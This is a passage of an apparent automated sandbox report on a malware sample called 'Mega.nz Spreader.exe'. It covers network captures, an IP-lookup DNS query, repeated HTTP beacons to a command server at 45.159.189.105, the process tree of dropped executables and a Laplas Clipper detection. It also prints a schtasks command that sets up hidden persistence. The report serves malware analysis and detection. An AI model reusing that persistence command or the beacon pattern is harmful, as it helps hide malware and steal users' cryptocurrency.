Jul 31, 2024 18:28:18.233346939 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.243801117 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.244899988 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.244962931 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.290796995 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.290875912 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.338886976 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.338967085 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.386693954 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.386759996 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.438716888 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.438786030 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.486706018 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.486763000 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.537029982 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.537097931 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.587347031 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.587399960 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.634677887 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.634737015 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.682790041 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.682847023 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.734769106 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.734842062 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.783058882 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.783122063 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.839458942 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.839520931 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.886784077 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.886862993 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.934953928 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.935017109 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.986736059 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:18.986814976 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.038680077 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.038769007 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.086755037 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.086833954 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.139137983 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.139214993 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.187273026 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.187350035 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.231161118 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.231245041 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.278726101 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.278793097 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.334379911 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.336427927 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.398035049 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.398113012 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.451141119 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.452411890 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.528386116 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.532409906 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.576716900 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.580437899 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.626952887 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.627007961 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.682812929 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.682883024 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.731590986 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.731698036 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.778749943 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.778814077 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.826853991 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.826956034 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.878989935 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.879060030 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.928343058 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.928431034 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:19.976437092 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:19.976501942 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.023420095 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.023597002 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.070828915 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.070898056 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.118776083 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.118843079 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.166754961 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.166810036 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.218985081 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.219058037 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.266751051 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.266815901 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.318689108 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.325236082 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.378813982 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.378885984 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.426691055 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.426749945 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.483331919 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.483681917 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.547127008 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.548423052 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.594701052 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.596437931 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.646878004 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.647151947 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.698730946 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.698816061 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.750754118 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.750812054 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.798702955 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.798768997 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.847605944 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.847665071 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.899501085 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.899580956 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.947424889 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.947642088 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:20.994757891 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:20.994813919 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.042746067 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.042821884 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.090713024 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.090775013 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.139017105 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.139077902 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.191211939 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.191273928 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.238668919 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.238734961 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.290767908 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.290832043 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.342736006 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.342803955 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.390737057 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.390794039 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.443126917 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.443186045 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.490756035 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:21.490839958 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:21.909652948 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:22.519023895 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:22.641212940 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:22.641315937 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:23.106286049 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:23.107573032 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:23.113677025 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:23.117141008 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:59.636603117 CEST	49719	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:28:59.644372940 CEST	80	49719	45.159.189.105	192.168.2.5
Jul 31, 2024 18:28:59.644460917 CEST	49719	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:28:59.645414114 CEST	49719	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:28:59.656184912 CEST	80	49719	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:20.997602940 CEST	80	49719	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:20.997849941 CEST	49719	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:21.026458025 CEST	49719	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:21.031033039 CEST	49720	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:21.031886101 CEST	80	49719	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:21.039715052 CEST	80	49720	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:21.039798975 CEST	49720	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:21.039943933 CEST	49720	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:21.044986963 CEST	80	49720	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:42.420341015 CEST	80	49720	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:42.420442104 CEST	49720	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:42.420564890 CEST	49720	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:42.425820112 CEST	80	49720	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:43.535388947 CEST	49721	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:43.541018009 CEST	80	49721	45.159.189.105	192.168.2.5
Jul 31, 2024 18:29:43.541127920 CEST	49721	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:43.541286945 CEST	49721	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:29:43.546192884 CEST	80	49721	45.159.189.105	192.168.2.5
Jul 31, 2024 18:30:04.889183044 CEST	80	49721	45.159.189.105	192.168.2.5
Jul 31, 2024 18:30:04.889267921 CEST	49721	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:30:04.889765978 CEST	49721	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:30:04.890146971 CEST	49722	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:30:04.895308971 CEST	80	49721	45.159.189.105	192.168.2.5
Jul 31, 2024 18:30:04.895342112 CEST	80	49722	45.159.189.105	192.168.2.5
Jul 31, 2024 18:30:04.895411015 CEST	49722	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:30:04.895703077 CEST	49722	80	192.168.2.5	45.159.189.105
Jul 31, 2024 18:30:04.901513100 CEST	80	49722	45.159.189.105	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 31, 2024 18:28:01.574095011 CEST	58873	53	192.168.2.5	1.1.1.1
Jul 31, 2024 18:28:01.582536936 CEST	53	58873	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 31, 2024 18:28:01.574095011 CEST	192.168.2.5	1.1.1.1	0x18a9	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 31, 2024 18:28:01.582536936 CEST	1.1.1.1	192.168.2.5	0x18a9	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jul 31, 2024 18:28:01.582536936 CEST	1.1.1.1	192.168.2.5	0x18a9	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jul 31, 2024 18:28:01.582536936 CEST	1.1.1.1	192.168.2.5	0x18a9	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

45.159.189.105

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49719	45.159.189.105	80	2568	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 18:28:59.645414114 CEST	142	OUT	GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1 Host: 45.159.189.105 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49720	45.159.189.105	80	2568	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 18:29:21.039943933 CEST	142	OUT	GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1 Host: 45.159.189.105 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49721	45.159.189.105	80	2568	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 18:29:43.541286945 CEST	142	OUT	GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1 Host: 45.159.189.105 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	45.159.189.105	80	2568	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe

Timestamp	Bytes transferred	Direction	Data
Jul 31, 2024 18:30:04.895703077 CEST	142	OUT	GET /bot/regex?key=6c78a6e987dfc45100108d0fd40e03bd210668f370b6f27ea666ba07cdab694d HTTP/1.1 Host: 45.159.189.105 Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.26.12.205	443	5656	C:\Users\user\AppData\Local\Temp\api.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-31 16:28:02 UTC	100	OUT	GET / HTTP/1.1 Accept: text/html; text/plain; / Host: api.ipify.org Cache-Control: no-cache
2024-07-31 16:28:02 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 16:28:02 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8abef59458bfc452-EWR
2024-07-31 16:28:02 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Target ID:	0
Start time:	12:27:59
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\Mega.nz Spreader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Mega.nz Spreader.exe"
Imagebase:	0x400000
File size:	8'953'856 bytes
MD5 hash:	56B45C6EDD70B8D85DF6399EEA6D24D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:27:59
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\leaf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\leaf.exe"
Imagebase:	0x8a0000
File size:	645'632 bytes
MD5 hash:	8C8C3BCF475B5C95673A810B10A2FC52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:27:59
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\api.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\api.exe"
Imagebase:	0xd90000
File size:	693'248 bytes
MD5 hash:	9022192413DDA223B6E8AFD73A22CFAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:28:00
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\lib.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\lib.exe"
Imagebase:	0x7ff759950000
File size:	7'608'923 bytes
MD5 hash:	D1540618704ECACA1A503B496ED7B801
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:28:00
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:28:02
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\lib.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\lib.exe"
Imagebase:	0x7ff759950000
File size:	7'608'923 bytes
MD5 hash:	D1540618704ECACA1A503B496ED7B801
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:28:15
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\leaf.exe
Wow64 process (32bit):	false
Commandline:	"{path}"
Imagebase:	0x30000
File size:	645'632 bytes
MD5 hash:	8C8C3BCF475B5C95673A810B10A2FC52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:28:15
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\leaf.exe
Wow64 process (32bit):	true
Commandline:	"{path}"
Imagebase:	0xc60000
File size:	645'632 bytes
MD5 hash:	8C8C3BCF475B5C95673A810B10A2FC52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:28:37
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:28:37
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:28:38
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn \eOzNUSwmQA /tr "C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0xd80000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:28:42
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Imagebase:	0x530000
File size:	659'151'360 bytes
MD5 hash:	A0E117D70EEB8A8AEAB628C95E78F524
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:28:58
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Wow64 process (32bit):	true
Commandline:	"{path}"
Imagebase:	0x960000
File size:	659'151'360 bytes
MD5 hash:	A0E117D70EEB8A8AEAB628C95E78F524
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LaplasClipper, Description: Yara detected Laplas Clipper, Source: 00000011.00000002.3289763270.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	12:29:05
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Imagebase:	0x3a0000
File size:	659'151'360 bytes
MD5 hash:	A0E117D70EEB8A8AEAB628C95E78F524
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:29:20
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Wow64 process (32bit):	false
Commandline:	"{path}"
Imagebase:	0x200000
File size:	659'151'360 bytes
MD5 hash:	A0E117D70EEB8A8AEAB628C95E78F524
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:29:24
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Wow64 process (32bit):	true
Commandline:	"{path}"
Imagebase:	0x5d0000
File size:	659'151'360 bytes
MD5 hash:	A0E117D70EEB8A8AEAB628C95E78F524
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:30:05
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\eOzNUSwmQA\svcupdater.exe
Imagebase:	0x8d0000
File size:	659'151'360 bytes
MD5 hash:	A0E117D70EEB8A8AEAB628C95E78F524
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	79.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	22
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004014AD Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014C7
SetUnhandledExceptionFilter.KERNEL32(0040148B), ref: 004014D5
__set_app_type.MSVCRT ref: 004014E0
_controlfp.MSVCRT ref: 004014F4
__getmainargs.MSVCRT ref: 00401522
exit.MSVCRT ref: 00401554

Memory Dump Source

Source File: 00000000.00000002.2036585757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2036548693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2036603684.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2037949080.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mega.jbxd

Similarity

API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
String ID:
API String ID: 3649950142-0
Opcode ID: fda98f6c57ce562671f2aded5df477c9688c81d109744525940a9da66ad68092
Instruction ID: 9276c2e774000c42ff709b9735208b177da51b3f110f19c2a6def3996bbd4299
Opcode Fuzzy Hash: fda98f6c57ce562671f2aded5df477c9688c81d109744525940a9da66ad68092
Instruction Fuzzy Hash: 6E111BF5E02204AFDB00EBA8EC85F5F73ACAB48314F144476F804E3361E639E9448B69

Function 0040108C Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 221
filestringCOMMON

Download Yara Rule

